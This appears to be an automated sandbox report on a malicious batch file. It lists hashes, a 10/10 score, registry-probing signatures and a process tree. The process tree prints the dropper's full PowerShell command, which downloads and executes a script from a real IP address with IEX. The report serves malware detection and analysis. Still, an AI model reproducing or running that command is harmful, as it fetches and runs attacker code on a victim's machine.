Analysis
-
max time kernel
99s -
max time network
150s -
platform
windows10_x64 -
resource
win10v191014 -
submitted
10-02-2020 21:10
Static task
static1
Behavioral task
behavioral1
Sample
4jD1biG2.bat
Resource
win7v191014
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
4jD1biG2.bat
Resource
win10v191014
windows10_x64
0 signatures
0 seconds
General
-
Target
4jD1biG2.bat
-
Size
191B
-
MD5
6097db04a430a1a65515bae911e13c6e
-
SHA1
41f39ba8f63c6ff8067348f596155beb32c45f17
-
SHA256
5743310e1c2bd52d3abf50fa874a206e42a4aac4e182447e99f3cf32be4334ed
-
SHA512
22fd4f652757e39fca2fa7b8a5d51cf951b76b200764b0ad45aa01cd38f9cbfb63df5542f08606fc198857cdecf1e4fd14d1cd005805203469b9dbb9a52ed777
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/4jD1biG2
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid process 1464 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 1464 WerFault.exe Token: SeBackupPrivilege 1464 WerFault.exe Token: SeDebugPrivilege 1464 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
WerFault.exepid process 1464 WerFault.exe 1464 WerFault.exe 1464 WerFault.exe 1464 WerFault.exe 1464 WerFault.exe 1464 WerFault.exe 1464 WerFault.exe 1464 WerFault.exe 1464 WerFault.exe 1464 WerFault.exe 1464 WerFault.exe 1464 WerFault.exe 1464 WerFault.exe 1464 WerFault.exe 1464 WerFault.exe 1464 WerFault.exe 1464 WerFault.exe 1464 WerFault.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
WerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\4jD1biG2.bat"1⤵PID:5104
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/4jD1biG2');Invoke-PBEESOQZ;Start-Sleep -s 10000"2⤵PID:2024
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Checks processor information in registry
- Enumerates system info in registry
PID:1464
-
\??\c:\windows\system32\taskhostw.exetaskhostw.exe -RegisterDevice -SettingChange -Full1⤵PID:4512